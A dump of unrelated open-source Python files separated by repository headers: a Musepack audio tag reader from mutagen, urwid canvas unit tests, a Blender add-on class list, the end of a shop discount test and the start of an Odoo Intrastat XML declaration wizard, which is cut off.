self.assertEqual('Something will happen', action['description'])
def test_has_discount_recorded_correctly_when_order_is_placed(self):
order = factories.create_order(basket=self.basket)
discounts = order.discounts.all()
self.assertEqual(1, len(discounts))
self.assertEqual(1, len(order.post_order_actions))
discount = discounts[0]
self.assertTrue(discount.is_post_order_action)
self.assertEqual(D('0.00'), discount.amount)
self.assertEqual('Something happened', discount.message)
|
gylian/headphones | refs/heads/master | lib/mutagen/musepack.py | 16 | # A Musepack reader/tagger
#
# Copyright 2006 Lukas Lalinsky <lalinsky@gmail.com>
# Copyright 2012 Christoph Reiter <christoph.reiter@gmx.at>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
"""Musepack audio streams with APEv2 tags.
Musepack is an audio format originally based on the MPEG-1 Layer-2
algorithms. Stream versions 4 through 7 are supported.
For more information, see http://www.musepack.net/.
"""
__all__ = ["Musepack", "Open", "delete"]
import struct
from mutagen.apev2 import APEv2File, error, delete
from mutagen.id3 import BitPaddedInt
from mutagen._util import cdata
class MusepackHeaderError(error):
pass
RATES = [44100, 48000, 37800, 32000]
def _parse_sv8_int(fileobj, limit=9):
"""Reads (max limit) bytes from fileobj until the MSB is zero.
All 7 LSB will be merged to a big endian uint.
Raises ValueError in case not MSB is zero, or EOFError in
case the file ended before limit is reached.
Returns (parsed number, number of bytes read)
"""
num = 0
for i in xrange(limit):
c = fileobj.read(1)
if len(c) != 1:
raise EOFError
num = (num << 7) | (ord(c) & 0x7F)
if not ord(c) & 0x80:
return num, i + 1
if limit > 0:
raise ValueError
return 0, 0
def _calc_sv8_gain(gain):
# 64.82 taken from mpcdec
return 64.82 - gain / 256.0
def _calc_sv8_peak(peak):
return (10 ** (peak / (256.0 * 20.0)) / 65535.0)
class MusepackInfo(object):
"""Musepack stream information.
Attributes:
* channels -- number of audio channels
* length -- file length in seconds, as a float
* sample_rate -- audio sampling rate in Hz
* bitrate -- audio bitrate, in bits per second
* version -- Musepack stream version
Optional Attributes:
* title_gain, title_peak -- Replay Gain and peak data for this song
* album_gain, album_peak -- Replay Gain and peak data for this album
These attributes are only available in stream version 7/8. The
gains are a float, +/- some dB. The peaks are a percentage [0..1] of
the maximum amplitude. This means to get a number comparable to
VorbisGain, you must multiply the peak by 2.
"""
def __init__(self, fileobj):
header = fileobj.read(4)
if len(header) != 4:
raise MusepackHeaderError("not a Musepack file")
# Skip ID3v2 tags
if header[:3] == "ID3":
header = fileobj.read(6)
if len(header) != 6:
raise MusepackHeaderError("not a Musepack file")
size = 10 + BitPaddedInt(header[2:6])
fileobj.seek(size)
header = fileobj.read(4)
if len(header) != 4:
raise MusepackHeaderError("not a Musepack file")
if header.startswith("MPCK"):
self.__parse_sv8(fileobj)
else:
self.__parse_sv467(fileobj)
if not self.bitrate and self.length != 0:
fileobj.seek(0, 2)
self.bitrate = int(round(fileobj.tell() * 8 / self.length))
def __parse_sv8(self, fileobj):
#SV8 http://trac.musepack.net/trac/wiki/SV8Specification
key_size = 2
mandatory_packets = ["SH", "RG"]
def check_frame_key(key):
if len(frame_type) != key_size or not 'AA' <= frame_type <= 'ZZ':
raise MusepackHeaderError("Invalid frame key.")
frame_type = fileobj.read(key_size)
check_frame_key(frame_type)
while frame_type not in ("AP", "SE") and mandatory_packets:
try:
frame_size, slen = _parse_sv8_int(fileobj)
except (EOFError, ValueError):
raise MusepackHeaderError("Invalid packet size.")
data_size = frame_size - key_size - slen
if frame_type == "SH":
mandatory_packets.remove(frame_type)
self.__parse_stream_header(fileobj, data_size)
elif frame_type == "RG":
mandatory_packets.remove(frame_type)
self.__parse_replaygain_packet(fileobj, data_size)
else:
fileobj.seek(data_size, 1)
frame_type = fileobj.read(key_size)
check_frame_key(frame_type)
if mandatory_packets:
raise MusepackHeaderError("Missing mandatory packets: %s."
% ", ".join(mandatory_packets))
self.length = float(self.samples) / self.sample_rate
self.bitrate = 0
def __parse_stream_header(self, fileobj, data_size):
fileobj.seek(4, 1)
try:
self.version = ord(fileobj.read(1))
except TypeError:
raise MusepackHeaderError("SH packet ended unexpectedly.")
try:
samples, l1 = _parse_sv8_int(fileobj)
samples_skip, l2 = _parse_sv8_int(fileobj)
except (EOFError, ValueError):
raise MusepackHeaderError(
"SH packet: Invalid sample counts.")
left_size = data_size - 5 - l1 - l2
if left_size != 2:
raise MusepackHeaderError("Invalid SH packet size.")
data = fileobj.read(left_size)
if len(data) != left_size:
raise MusepackHeaderError("SH packet ended unexpectedly.")
self.sample_rate = RATES[ord(data[-2]) >> 5]
self.channels = (ord(data[-1]) >> 4) + 1
self.samples = samples - samples_skip
def __parse_replaygain_packet(self, fileobj, data_size):
data = fileobj.read(data_size)
if data_size != 9:
raise MusepackHeaderError("Invalid RG packet size.")
if len(data) != data_size:
raise MusepackHeaderError("RG packet ended unexpectedly.")
title_gain = cdata.short_be(data[1:3])
title_peak = cdata.short_be(data[3:5])
album_gain = cdata.short_be(data[5:7])
album_peak = cdata.short_be(data[7:9])
if title_gain:
self.title_gain = _calc_sv8_gain(title_gain)
if title_peak:
self.title_peak = _calc_sv8_peak(title_peak)
if album_gain:
self.album_gain = _calc_sv8_gain(album_gain)
if album_peak:
self.album_peak = _calc_sv8_peak(album_peak)
def __parse_sv467(self, fileobj):
fileobj.seek(-4, 1)
header = fileobj.read(32)
if len(header) != 32:
raise MusepackHeaderError("not a Musepack file")
# SV7
if header.startswith("MP+"):
self.version = ord(header[3]) & 0xF
if self.version < 7:
raise MusepackHeaderError("not a Musepack file")
frames = cdata.uint_le(header[4:8])
flags = cdata.uint_le(header[8:12])
self.title_peak, self.title_gain = struct.unpack(
"<Hh", header[12:16])
self.album_peak, self.album_gain = struct.unpack(
"<Hh", header[16:20])
self.title_gain /= 100.0
self.album_gain /= 100.0
self.title_peak /= 65535.0
self.album_peak /= 65535.0
self.sample_rate = RATES[(flags >> 16) & 0x0003]
self.bitrate = 0
# SV4-SV6
else:
header_dword = cdata.uint_le(header[0:4])
self.version = (header_dword >> 11) & 0x03FF
if self.version < 4 or self.version > 6:
raise MusepackHeaderError("not a Musepack file")
self.bitrate = (header_dword >> 23) & 0x01FF
self.sample_rate = 44100
if self.version >= 5:
frames = cdata.uint_le(header[4:8])
else:
frames = cdata.ushort_le(header[6:8])
if self.version < 6:
frames -= 1
self.channels = 2
self.length = float(frames * 1152 - 576) / self.sample_rate
def pprint(self):
rg_data = []
if hasattr(self, "title_gain"):
rg_data.append("%+0.2f (title)" % self.title_gain)
if hasattr(self, "album_gain"):
rg_data.append("%+0.2f (album)" % self.album_gain)
rg_data = (rg_data and ", Gain: " + ", ".join(rg_data)) or ""
return "Musepack SV%d, %.2f seconds, %d Hz, %d bps%s" % (
self.version, self.length, self.sample_rate, self.bitrate, rg_data)
class Musepack(APEv2File):
_Info = MusepackInfo
_mimes = ["audio/x-musepack", "audio/x-mpc"]
@staticmethod
def score(filename, fileobj, header):
return (header.startswith("MP+") + header.startswith("MPCK") +
filename.lower().endswith(".mpc"))
Open = Musepack
|
harlowja/urwid | refs/heads/master | urwid/tests/test_canvas.py | 23 | import unittest
from urwid import canvas
from urwid.compat import B
import urwid
class CanvasCacheTest(unittest.TestCase):
def setUp(self):
# purge the cache
urwid.CanvasCache._widgets.clear()
def cct(self, widget, size, focus, expected):
got = urwid.CanvasCache.fetch(widget, urwid.Widget, size, focus)
assert expected==got, "got: %s expected: %s"%(got, expected)
def test1(self):
a = urwid.Text("")
b = urwid.Text("")
blah = urwid.TextCanvas()
blah.finalize(a, (10,1), False)
blah2 = urwid.TextCanvas()
blah2.finalize(a, (15,1), False)
bloo = urwid.TextCanvas()
bloo.finalize(b, (20,2), True)
urwid.CanvasCache.store(urwid.Widget, blah)
urwid.CanvasCache.store(urwid.Widget, blah2)
urwid.CanvasCache.store(urwid.Widget, bloo)
self.cct(a, (10,1), False, blah)
self.cct(a, (15,1), False, blah2)
self.cct(a, (15,1), True, None)
self.cct(a, (10,2), False, None)
self.cct(b, (20,2), True, bloo)
self.cct(b, (21,2), True, None)
urwid.CanvasCache.invalidate(a)
self.cct(a, (10,1), False, None)
self.cct(a, (15,1), False, None)
self.cct(b, (20,2), True, bloo)
class CanvasTest(unittest.TestCase):
def ct(self, text, attr, exp_content):
c = urwid.TextCanvas([B(t) for t in text], attr)
content = list(c.content())
assert content == exp_content, "got: %r expected: %r" % (content,
exp_content)
def ct2(self, text, attr, left, top, cols, rows, def_attr, exp_content):
c = urwid.TextCanvas([B(t) for t in text], attr)
content = list(c.content(left, top, cols, rows, def_attr))
assert content == exp_content, "got: %r expected: %r" % (content,
exp_content)
def test1(self):
self.ct(["Hello world"], None, [[(None, None, B("Hello world"))]])
self.ct(["Hello world"], [[("a",5)]],
[[("a", None, B("Hello")), (None, None, B(" world"))]])
self.ct(["Hi","There"], None,
[[(None, None, B("Hi "))], [(None, None, B("There"))]])
def test2(self):
self.ct2(["Hello"], None, 0, 0, 5, 1, None,
[[(None, None, B("Hello"))]])
self.ct2(["Hello"], None, 1, 0, 4, 1, None,
[[(None, None, B("ello"))]])
self.ct2(["Hello"], None, 0, 0, 4, 1, None,
[[(None, None, B("Hell"))]])
self.ct2(["Hi","There"], None, 1, 0, 3, 2, None,
[[(None, None, B("i "))], [(None, None, B("her"))]])
self.ct2(["Hi","There"], None, 0, 0, 5, 1, None,
[[(None, None, B("Hi "))]])
self.ct2(["Hi","There"], None, 0, 1, 5, 1, None,
[[(None, None, B("There"))]])
class ShardBodyTest(unittest.TestCase):
def sbt(self, shards, shard_tail, expected):
result = canvas.shard_body(shards, shard_tail, False)
assert result == expected, "got: %r expected: %r" % (result, expected)
def sbttail(self, num_rows, sbody, expected):
result = canvas.shard_body_tail(num_rows, sbody)
assert result == expected, "got: %r expected: %r" % (result, expected)
def sbtrow(self, sbody, expected):
result = list(canvas.shard_body_row(sbody))
assert result == expected, "got: %r expected: %r" % (result, expected)
def test1(self):
cviews = [(0,0,10,5,None,"foo"),(0,0,5,5,None,"bar")]
self.sbt(cviews, [],
[(0, None, (0,0,10,5,None,"foo")),
(0, None, (0,0,5,5,None,"bar"))])
self.sbt(cviews, [(0, 3, None, (0,0,5,8,None,"baz"))],
[(3, None, (0,0,5,8,None,"baz")),
(0, None, (0,0,10,5,None,"foo")),
(0, None, (0,0,5,5,None,"bar"))])
self.sbt(cviews, [(10, 3, None, (0,0,5,8,None,"baz"))],
[(0, None, (0,0,10,5,None,"foo")),
(3, None, (0,0,5,8,None,"baz")),
(0, None, (0,0,5,5,None,"bar"))])
self.sbt(cviews, [(15, 3, None, (0,0,5,8,None,"baz"))],
[(0, None, (0,0,10,5,None,"foo")),
(0, None, (0,0,5,5,None,"bar")),
(3, None, (0,0,5,8,None,"baz"))])
def test2(self):
sbody = [(0, None, (0,0,10,5,None,"foo")),
(0, None, (0,0,5,5,None,"bar")),
(3, None, (0,0,5,8,None,"baz"))]
self.sbttail(5, sbody, [])
self.sbttail(3, sbody,
[(0, 3, None, (0,0,10,5,None,"foo")),
(0, 3, None, (0,0,5,5,None,"bar")),
(0, 6, None, (0,0,5,8,None,"baz"))])
sbody = [(0, None, (0,0,10,3,None,"foo")),
(0, None, (0,0,5,5,None,"bar")),
(3, None, (0,0,5,9,None,"baz"))]
self.sbttail(3, sbody,
[(10, 3, None, (0,0,5,5,None,"bar")),
(0, 6, None, (0,0,5,9,None,"baz"))])
def test3(self):
self.sbtrow([(0, None, (0,0,10,5,None,"foo")),
(0, None, (0,0,5,5,None,"bar")),
(3, None, (0,0,5,8,None,"baz"))],
[20])
self.sbtrow([(0, iter("foo"), (0,0,10,5,None,"foo")),
(0, iter("bar"), (0,0,5,5,None,"bar")),
(3, iter("zzz"), (0,0,5,8,None,"baz"))],
["f","b","z"])
class ShardsTrimTest(unittest.TestCase):
def sttop(self, shards, top, expected):
result = canvas.shards_trim_top(shards, top)
assert result == expected, "got: %r expected: %r" (result, expected)
def strows(self, shards, rows, expected):
result = canvas.shards_trim_rows(shards, rows)
assert result == expected, "got: %r expected: %r" (result, expected)
def stsides(self, shards, left, cols, expected):
result = canvas.shards_trim_sides(shards, left, cols)
assert result == expected, "got: %r expected: %r" (result, expected)
def test1(self):
shards = [(5, [(0,0,10,5,None,"foo"),(0,0,5,5,None,"bar")])]
self.sttop(shards, 2,
[(3, [(0,2,10,3,None,"foo"),(0,2,5,3,None,"bar")])])
self.strows(shards, 2,
[(2, [(0,0,10,2,None,"foo"),(0,0,5,2,None,"bar")])])
shards = [(5, [(0,0,10,5,None,"foo")]),(3,[(0,0,10,3,None,"bar")])]
self.sttop(shards, 2,
[(3, [(0,2,10,3,None,"foo")]),(3,[(0,0,10,3,None,"bar")])])
self.sttop(shards, 5,
[(3, [(0,0,10,3,None,"bar")])])
self.sttop(shards, 7,
[(1, [(0,2,10,1,None,"bar")])])
self.strows(shards, 7,
[(5, [(0,0,10,5,None,"foo")]),(2, [(0,0,10,2,None,"bar")])])
self.strows(shards, 5,
[(5, [(0,0,10,5,None,"foo")])])
self.strows(shards, 4,
[(4, [(0,0,10,4,None,"foo")])])
shards = [(5, [(0,0,10,5,None,"foo"), (0,0,5,8,None,"baz")]),
(3,[(0,0,10,3,None,"bar")])]
self.sttop(shards, 2,
[(3, [(0,2,10,3,None,"foo"), (0,2,5,6,None,"baz")]),
(3,[(0,0,10,3,None,"bar")])])
self.sttop(shards, 5,
[(3, [(0,0,10,3,None,"bar"), (0,5,5,3,None,"baz")])])
self.sttop(shards, 7,
[(1, [(0,2,10,1,None,"bar"), (0,7,5,1,None,"baz")])])
self.strows(shards, 7,
[(5, [(0,0,10,5,None,"foo"), (0,0,5,7,None,"baz")]),
(2, [(0,0,10,2,None,"bar")])])
self.strows(shards, 5,
[(5, [(0,0,10,5,None,"foo"), (0,0,5,5,None,"baz")])])
self.strows(shards, 4,
[(4, [(0,0,10,4,None,"foo"), (0,0,5,4,None,"baz")])])
def test2(self):
shards = [(5, [(0,0,10,5,None,"foo"),(0,0,5,5,None,"bar")])]
self.stsides(shards, 0, 15,
[(5, [(0,0,10,5,None,"foo"),(0,0,5,5,None,"bar")])])
self.stsides(shards, 6, 9,
[(5, [(6,0,4,5,None,"foo"),(0,0,5,5,None,"bar")])])
self.stsides(shards, 6, 6,
[(5, [(6,0,4,5,None,"foo"),(0,0,2,5,None,"bar")])])
self.stsides(shards, 0, 10,
[(5, [(0,0,10,5,None,"foo")])])
self.stsides(shards, 10, 5,
[(5, [(0,0,5,5,None,"bar")])])
self.stsides(shards, 1, 7,
[(5, [(1,0,7,5,None,"foo")])])
shards = [(5, [(0,0,10,5,None,"foo"), (0,0,5,8,None,"baz")]),
(3,[(0,0,10,3,None,"bar")])]
self.stsides(shards, 0, 15,
[(5, [(0,0,10,5,None,"foo"), (0,0,5,8,None,"baz")]),
(3,[(0,0,10,3,None,"bar")])])
self.stsides(shards, 2, 13,
[(5, [(2,0,8,5,None,"foo"), (0,0,5,8,None,"baz")]),
(3,[(2,0,8,3,None,"bar")])])
self.stsides(shards, 2, 10,
[(5, [(2,0,8,5,None,"foo"), (0,0,2,8,None,"baz")]),
(3,[(2,0,8,3,None,"bar")])])
self.stsides(shards, 2, 8,
[(5, [(2,0,8,5,None,"foo")]),
(3,[(2,0,8,3,None,"bar")])])
self.stsides(shards, 2, 6,
[(5, [(2,0,6,5,None,"foo")]),
(3,[(2,0,6,3,None,"bar")])])
self.stsides(shards, 10, 5,
[(8, [(0,0,5,8,None,"baz")])])
self.stsides(shards, 11, 3,
[(8, [(1,0,3,8,None,"baz")])])
class ShardsJoinTest(unittest.TestCase):
def sjt(self, shard_lists, expected):
result = canvas.shards_join(shard_lists)
assert result == expected, "got: %r expected: %r" (result, expected)
def test(self):
shards1 = [(5, [(0,0,10,5,None,"foo"), (0,0,5,8,None,"baz")]),
(3,[(0,0,10,3,None,"bar")])]
shards2 = [(3, [(0,0,10,3,None,"aaa")]),
(5,[(0,0,10,5,None,"bbb")])]
shards3 = [(3, [(0,0,10,3,None,"111")]),
(2,[(0,0,10,3,None,"222")]),
(3,[(0,0,10,3,None,"333")])]
self.sjt([shards1], shards1)
self.sjt([shards1, shards2],
[(3, [(0,0,10,5,None,"foo"), (0,0,5,8,None,"baz"),
(0,0,10,3,None,"aaa")]),
(2, [(0,0,10,5,None,"bbb")]),
(3, [(0,0,10,3,None,"bar")])])
self.sjt([shards1, shards3],
[(3, [(0,0,10,5,None,"foo"), (0,0,5,8,None,"baz"),
(0,0,10,3,None,"111")]),
(2, [(0,0,10,3,None,"222")]),
(3, [(0,0,10,3,None,"bar"), (0,0,10,3,None,"333")])])
self.sjt([shards1, shards2, shards3],
[(3, [(0,0,10,5,None,"foo"), (0,0,5,8,None,"baz"),
(0,0,10,3,None,"aaa"), (0,0,10,3,None,"111")]),
(2, [(0,0,10,5,None,"bbb"), (0,0,10,3,None,"222")]),
(3, [(0,0,10,3,None,"bar"), (0,0,10,3,None,"333")])])
class CanvasJoinTest(unittest.TestCase):
def cjtest(self, desc, l, expected):
l = [(c, None, False, n) for c, n in l]
result = list(urwid.CanvasJoin(l).content())
assert result == expected, "%s expected %r, got %r"%(
desc, expected, result)
def test(self):
C = urwid.TextCanvas
hello = C([B("hello")])
there = C([B("there")], [[("a",5)]])
a = C([B("a")])
hi = C([B("hi")])
how = C([B("how")], [[("a",1)]])
dy = C([B("dy")])
how_you = C([B("how"), B("you")])
self.cjtest("one", [(hello, 5)],
[[(None, None, B("hello"))]])
self.cjtest("two", [(hello, 5), (there, 5)],
[[(None, None, B("hello")), ("a", None, B("there"))]])
self.cjtest("two space", [(hello, 7), (there, 5)],
[[(None, None, B("hello")),(None,None,B(" ")),
("a", None, B("there"))]])
self.cjtest("three space", [(hi, 4), (how, 3), (dy, 2)],
[[(None, None, B("hi")),(None,None,B(" ")),("a",None, B("h")),
(None,None,B("ow")),(None,None,B("dy"))]])
self.cjtest("four space", [(a, 2), (hi, 3), (dy, 3), (a, 1)],
[[(None, None, B("a")),(None,None,B(" ")),
(None, None, B("hi")),(None,None,B(" ")),
(None, None, B("dy")),(None,None,B(" ")),
(None, None, B("a"))]])
self.cjtest("pile 2", [(how_you, 4), (hi, 2)],
[[(None, None, B('how')), (None, None, B(' ')),
(None, None, B('hi'))],
[(None, None, B('you')), (None, None, B(' ')),
(None, None, B(' '))]])
self.cjtest("pile 2r", [(hi, 4), (how_you, 3)],
[[(None, None, B('hi')), (None, None, B(' ')),
(None, None, B('how'))],
[(None, None, B(' ')),
(None, None, B('you'))]])
class CanvasOverlayTest(unittest.TestCase):
def cotest(self, desc, bgt, bga, fgt, fga, l, r, et):
bgt = B(bgt)
fgt = B(fgt)
bg = urwid.CompositeCanvas(
urwid.TextCanvas([bgt],[bga]))
fg = urwid.CompositeCanvas(
urwid.TextCanvas([fgt],[fga]))
bg.overlay(fg, l, 0)
result = list(bg.content())
assert result == et, "%s expected %r, got %r"%(
desc, et, result)
def test1(self):
self.cotest("left", "qxqxqxqx", [], "HI", [], 0, 6,
[[(None, None, B("HI")),(None,None,B("qxqxqx"))]])
self.cotest("right", "qxqxqxqx", [], "HI", [], 6, 0,
[[(None, None, B("qxqxqx")),(None,None,B("HI"))]])
self.cotest("center", "qxqxqxqx", [], "HI", [], 3, 3,
[[(None, None, B("qxq")),(None,None,B("HI")),
(None,None,B("xqx"))]])
self.cotest("center2", "qxqxqxqx", [], "HI ", [], 2, 2,
[[(None, None, B("qx")),(None,None,B("HI ")),
(None,None,B("qx"))]])
self.cotest("full", "rz", [], "HI", [], 0, 0,
[[(None, None, B("HI"))]])
def test2(self):
self.cotest("same","asdfghjkl",[('a',9)],"HI",[('a',2)],4,3,
[[('a',None,B("asdf")),('a',None,B("HI")),('a',None,B("jkl"))]])
self.cotest("diff","asdfghjkl",[('a',9)],"HI",[('b',2)],4,3,
[[('a',None,B("asdf")),('b',None,B("HI")),('a',None,B("jkl"))]])
self.cotest("None end","asdfghjkl",[('a',9)],"HI ",[('a',2)],
2,3,
[[('a',None,B("as")),('a',None,B("HI")),
(None,None,B(" ")),('a',None,B("jkl"))]])
self.cotest("float end","asdfghjkl",[('a',3)],"HI",[('a',2)],
4,3,
[[('a',None,B("asd")),(None,None,B("f")),
('a',None,B("HI")),(None,None,B("jkl"))]])
self.cotest("cover 2","asdfghjkl",[('a',5),('c',4)],"HI",
[('b',2)],4,3,
[[('a',None,B("asdf")),('b',None,B("HI")),('c',None,B("jkl"))]])
self.cotest("cover 2-2","asdfghjkl",
[('a',4),('d',1),('e',1),('c',3)],
"HI",[('b',2)], 4, 3,
[[('a',None,B("asdf")),('b',None,B("HI")),('c',None,B("jkl"))]])
def test3(self):
urwid.set_encoding("euc-jp")
self.cotest("db0","\xA1\xA1\xA1\xA1\xA1\xA1",[],"HI",[],2,2,
[[(None,None,B("\xA1\xA1")),(None,None,B("HI")),
(None,None,B("\xA1\xA1"))]])
self.cotest("db1","\xA1\xA1\xA1\xA1\xA1\xA1",[],"OHI",[],1,2,
[[(None,None,B(" ")),(None,None,B("OHI")),
(None,None,B("\xA1\xA1"))]])
self.cotest("db2","\xA1\xA1\xA1\xA1\xA1\xA1",[],"OHI",[],2,1,
[[(None,None,B("\xA1\xA1")),(None,None,B("OHI")),
(None,None,B(" "))]])
self.cotest("db3","\xA1\xA1\xA1\xA1\xA1\xA1",[],"OHIO",[],1,1,
[[(None,None,B(" ")),(None,None,B("OHIO")),(None,None,B(" "))]])
class CanvasPadTrimTest(unittest.TestCase):
def cptest(self, desc, ct, ca, l, r, et):
ct = B(ct)
c = urwid.CompositeCanvas(
urwid.TextCanvas([ct], [ca]))
c.pad_trim_left_right(l, r)
result = list(c.content())
assert result == et, "%s expected %r, got %r"%(
desc, et, result)
def test1(self):
self.cptest("none", "asdf", [], 0, 0,
[[(None,None,B("asdf"))]])
self.cptest("left pad", "asdf", [], 2, 0,
[[(None,None,B(" ")),(None,None,B("asdf"))]])
self.cptest("right pad", "asdf", [], 0, 2,
[[(None,None,B("asdf")),(None,None,B(" "))]])
def test2(self):
self.cptest("left trim", "asdf", [], -2, 0,
[[(None,None,B("df"))]])
self.cptest("right trim", "asdf", [], 0, -2,
[[(None,None,B("as"))]])
|
feureau/Small-Scripts | refs/heads/master | Blender/Blender config/2.91/scripts/addons/assemblme_v1-4-0/lib/classes_to_register.py | 1 | """
Copyright (C) 2017 Bricks Brought to Life
http://bblanimation.com/
chris@bblanimation.com
Created by Christopher Gearhart
"""
# Module imports
from .preferences import *
from .report_error import *
from .property_groups import *
from ..ui import *
from ..operators import *
from .. import addon_updater_ops
classes = [
# assemblme/operators
create_build_animation.ASSEMBLME_OT_create_build_animation,
info_restore_preset.ASSEMBLME_OT_info_restore_preset,
new_group_from_selection.ASSEMBLME_OT_new_group_from_selection,
presets.ASSEMBLME_OT_anim_presets,
refresh_build_animation_length.ASSEMBLME_OT_refresh_anim_length,
start_over.ASSEMBLME_OT_start_over,
visualizer.ASSEMBLME_OT_visualizer,
aglist_actions.AGLIST_OT_list_action,
aglist_actions.AGLIST_OT_copy_settings_to_others,
aglist_actions.AGLIST_OT_copy_settings,
aglist_actions.AGLIST_OT_paste_settings,
aglist_actions.AGLIST_OT_set_to_active,
aglist_actions.AGLIST_OT_print_all_items,
aglist_actions.AGLIST_OT_clear_all_items,
# assemblme/ui
ASSEMBLME_MT_copy_paste_menu,
ASSEMBLME_PT_animations,
ASSEMBLME_PT_actions,
ASSEMBLME_PT_settings,
ASSEMBLME_PT_visualizer_settings,
ASSEMBLME_PT_preset_manager,
ASSEMBLME_UL_items,
# assemblme/lib
ASSEMBLME_PT_preferences,
SCENE_OT_report_error,
SCENE_OT_close_report_error,
AnimatedCollectionProperties,
AssemblMeProperties,
]
|
takis/odoo | refs/heads/8.0 | addons/l10n_be_intrastat/wizard/xml_decl.py | 205 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Odoo, Open Source Business Applications
# Copyright (C) 2014-2015 Odoo S.A. <http://www.odoo.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import base64
import xml.etree.ElementTree as ET
from collections import namedtuple
from datetime import datetime
from openerp import exceptions, SUPERUSER_ID, tools
from openerp.osv import fields, osv
from openerp.tools.translate import _
INTRASTAT_XMLNS = 'http://www.onegate.eu/2010-01-01'
class xml_decl(osv.TransientModel):
"""
Intrastat XML Declaration
"""
_name = "l10n_be_intrastat_xml.xml_decl"
_description = 'Intrastat XML Declaration'
def _get_tax_code(self, cr, uid, context=None):
obj_tax_code = self.pool.get('account.tax.code')
obj_user = self.pool.get('res.users')
company_id = obj_user.browse(cr, uid, uid, context=context).company_id.id
tax_code_ids = obj_tax_code.search(cr, uid, [('company_id', '=', company_id),
('parent_id', '=', False)],
context=context)
return tax_code_ids and tax_code_ids[0] or False
def _get_def_monthyear(self, cr, uid, context=None):
td = datetime.strptime(fields.date.context_today(self, cr, uid, context=context),
tools.DEFAULT_SERVER_DATE_FORMAT).date()
return td.strftime('%Y'), td.strftime('%m')
def _get_def_month(self, cr, uid, context=None):
return self._get_def_monthyear(cr, uid, context=context)[1]
def _get_def_year(self, cr, uid, context=None):
return self._get_def_monthyear(cr, uid, context=context)[0]
_columns = {
'name': fields.char('File Name'),
'month': fields.selection([('01','January'), ('02','February'), ('03','March'),
('04','April'), ('05','May'), ('06','June'), ('07','July'),
('08','August'), ('09','September'), ('10','October'),
('11','November'), ('12','December')], 'Month', required=True),
'year': fields.char('Year', size=4, required=True),
'tax_code_id': fields.many2one('account.tax.code', 'Company Tax Chart',
domain=[('parent_id', '=', False)], required=True),
'arrivals': fields.selection([('be-exempt', 'Exempt'),
('be-standard', 'Standard'),
('be-extended', 'Extended')],
'Arrivals', required=True),
'dispatches': fields.selection([('be-exempt', 'Exempt'),
('be-standard', 'Standard'),
('be-extended', 'Extended')],
'Dispatches', required=True),
'file_save': fields.binary('Intrastat Report File', readonly=True),
'state': fields.selection([('draft', 'Draft'), ('download', 'Download')], string="State"),
}
_defaults = {
'arrivals': 'be-standard',
'dispatches': 'be-standard',
'name': 'intrastat.xml',
'tax_code_id': _get_tax_code,
'month': _get_def_month,
'year': _get_def_year,
'state': 'draft',
}
def _company_warning(self, cr, uid, translated_msg, context=None):
""" Raise a error with custom message, asking user to configure company settings """
xmlid_mod = self.pool['ir.model.data']
action_id = xmlid_mod.xmlid_to_res_id(cr, uid, 'base.action_res_company_form')
raise exceptions.RedirectWarning(
translated_msg, action_id, _('Go to company configuration screen'))
def create_xml(self, cr, uid, ids, context=None):
"""Creates xml that is to be exported and sent to estate for partner vat intra.
:return: Value for next action.
:rtype: dict
"""
decl_datas = self.browse(cr, uid, ids[0])
company = decl_datas.tax_code_id.company_id
if not (company.partner_id and company.partner_id.country_id and
company.partner_id.country_id.id):
self._company_warning(
cr, uid,
_('The country of your company is not set, '
'please make sure to configure it first.'),
context=context)
kbo = company.company_registry
if not kbo:
self._company_warning(
cr, uid,
_('The registry number of your company is not set, '
'please make sure to configure it first.'),
context=context)
if len(decl_datas.year) != 4:
raise exceptions.Warning(_('Year must be 4 digits number (YYYY)'))
#Create root declaration
decl = ET.Element('DeclarationReport')
decl.set('xmlns', INTRASTAT_XMLNS)
#Add Administration elements
admin = ET.SubElement(decl, 'Administration')
fromtag = ET.SubElement(admin, 'From')
fromtag.text = kbo
fromtag.set('declarerType', 'KBO')
ET.SubElement(admin, 'To').text = "NBB"
ET.SubElement(admin, 'Domain').text = "SXX"
if decl_datas.arrivals == 'be-standard':
decl.append(self._get_lines(cr, SUPERUSER_ID, ids, decl_datas, company,
dispatchmode=False, extendedmode=False, context=context))
elif decl_datas.arrivals == 'be-extended':
decl.append(self._get_lines(cr, SUPERUSER_ID, ids, decl_datas, company,
dispatchmode=False, extendedmode=True, context=context))
if decl_datas.dispatches == 'be-standard':
decl.append(self._get_lines(cr, SUPERUSER_ID, ids, decl_datas, company,
dispatchmode=True, extendedmode=False, context=context))
elif decl_datas.dispatches == 'be-extended':
decl.append(self._get_lines(cr, SUPERUSER_ID, ids, decl_datas, company,
dispatchmode=True, extendedmode=True, context=context))
#Get xml string with declaration
data_file = ET.tostring(decl, encoding='UTF-8', method='xml')
#change state of the wizard
self.write(cr, uid, ids,
{'name': 'intrastat_%s%s.xml' % (decl_datas.year, decl_datas.month),
'file_save': base64.encodestring(data_file),
'state': 'download'},
context=context)
return {
'name': _('Save'),
'context': context,
'view_type': 'form',
'view_mode': 'form',
'res_model': 'l10n_be_intrastat_xml.xml_decl',
'type': 'ir.actions.act_window',
'target': 'new',
'res_id': ids[0],
}
def _get_lines(self, cr, uid, ids, decl_datas, company, dispatchmode=False,
extendedmode=False, context=None):
intrastatcode_mod = self.pool['report.intrastat.code']
invoiceline_mod = self.pool['account.invoice.line']
product_mod = self.pool['product.product']
region_mod = self.pool['l10n_be_intrastat.region']
warehouse_mod = self.pool['stock.warehouse']
if dispatchmode:
mode1 = 'out_invoice'
mode2 = 'in_refund'
declcode = "29"
else:
mode1 = 'in_invoice'
mode2 = 'out_refund'
declcode = "19"
decl = ET.Element('Report')
if not extendedmode:
decl.set('code', 'EX%sS' % declcode)
else:
decl.set('code', 'EX%sE' % declcode)
decl.set('date', '%s-%s' % (decl_datas.year, decl_datas.month))
datas = ET.SubElement(decl, 'Data')
if not extendedmode:
datas.set('form', 'EXF%sS' % declcode)
else:
